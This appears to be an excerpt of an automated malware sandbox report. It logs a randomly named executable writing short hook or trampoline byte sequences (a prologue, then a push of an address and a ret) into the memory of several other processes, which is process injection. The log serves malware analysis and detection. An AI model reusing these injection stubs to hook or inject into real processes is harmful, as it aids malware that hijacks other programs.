Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF00DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF00EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF00FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF0119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF0129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF0137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF0145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF0151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF0179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF0187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2E00000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2E00011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A00010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A0003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A00046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A00052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A00060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A0006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A0007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A0008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A00098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A000A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A000B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A000C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A000D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A000DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A000EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A000FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A0010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A00119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A00129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A00137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A00145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A00151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A0015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A0016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A00179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A00187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A10000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 2A10011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 1360010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 136003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 1360046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 1360052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 1360060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 136006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 136007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 136008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 1360098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 13600A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 13600B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 13600C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 13600D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 13600DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 13600EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 13600FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 136010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 1360119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 1360129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 1360137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 1360145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 1360151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 136015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 136016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 1360179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 1360187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 30A0000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 30A0011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F0010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F0046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F0052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F0060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F0098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F00A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F00B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F00C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F00D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F00DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F00EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F00FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F0119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F0129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F0137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F0145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F0151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F0179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 28F0187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 2900000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 2900011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 2280010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 228003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 2280046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 2280052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 2280060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 228006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 228007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 228008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 2280098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 22800A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 22800B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
